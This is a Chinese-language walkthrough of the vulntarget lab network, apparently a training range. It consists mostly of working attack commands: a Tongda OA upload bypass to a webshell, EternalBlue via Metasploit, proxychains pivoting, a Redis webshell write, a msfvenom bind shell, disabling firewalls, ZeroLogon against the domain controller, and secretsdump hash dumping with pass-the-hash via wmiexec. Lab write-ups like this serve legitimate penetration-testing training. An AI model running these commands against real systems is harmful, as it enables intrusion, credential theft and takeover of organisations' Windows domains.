靶场地址:https://github.com/crow821/vulntarget
拓扑结构
主机发现
netdiscover -r 192.168.127.0/24 -i eth0
端口扫描
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.127.130
访问目标80,发现为通达oa
默认账号admin,空密码登录后台
点击系统管理
-> 系统参数设置
-> OA服务设置
找到Webroot目录
点击系统管理
-> 附件管理
-> 添加存储目录
点击组织
-> 系统管理员
-> 上传附件
上传txt后缀文件,根据windows系统自动去掉.
的特性,利用burp抓包修改文件后缀为.php.
文件上传到:http://192.168.127.130/im/2309/528190762.a.php
,利用哥斯拉连接
除了80端口的通达oa,目标还开放了445端口
msfdb run
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.127.130
run
查看win7网卡信息,发现存在另一个网段
添加路由
run post/multi/manage/autoroute
利用msf的post/windows/gather/arp_scanner
模块收集内网存活主机
use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.0/24
利用auxiliary/server/socks_proxy
模块开启socks代理
use auxiliary/server/socks_proxy
set version 4a
run
修改/etc/proxychains4.conf
利用proxychains4
对内网10.0.20.99
主机进行端口扫描
proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.99
在80端口发现phpinfo.php,得到网站根目录路径: C:/phpStudy/PHPTutorial/WWW/
redis未授权访问,写入webshell
proxychains4 redis-cli -h 10.0.20.99
config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 ""
save
proxychains4代理,利用哥斯拉连接
proxychains4 java -jar godzilla.jar
关闭win2016防火墙,上传msf生成的bind_shell
netsh advfirewall set allprofiles state off #关闭防火墙
#msfvenom生成shell
msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe
利用哥斯拉上传
执行
.\shell.exe
msf上线
exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
run
win2016上发现另一个网段
添加路由
run post/multi/manage/autoroute
发现win2016加入域,域名:vulntarget.com
查看域内主机
net group "Domain Computers" /domain
查看域控
net group "Domain Controllers" /domain
域控ip:10.0.10.110
ping -n 1 WIN2019
打空域控密码,exp:https://github.com/VoidSec/CVE-2020-1472
proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
dump域控hash
proxychains4 impacket-secretsdump vulntarget.com/win2019\[email protected] -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
wmiexec上线
proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 ./[email protected]
net user administrator p-0p-0p-0 /domain #修改域控密码
netsh advfirewall set allprofiles state off #关防火墙
#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
连接3389
proxychains4 remmina
切换动态分辨率
保存注册表
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
下载.save
文件到本地解密
lget sam.save
lget security.save
lget system.save
解密
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
还原密码
proxychains4 python reinstall_original_pw.py win2019 10.0.10.110 346669a9c17532da61e8b473cb880ff0
再次尝试dump域控hash,发现失败,证明已经还原
proxychains4 impacket-secretsdump vulntarget.com/win2019\[email protected] -no-pass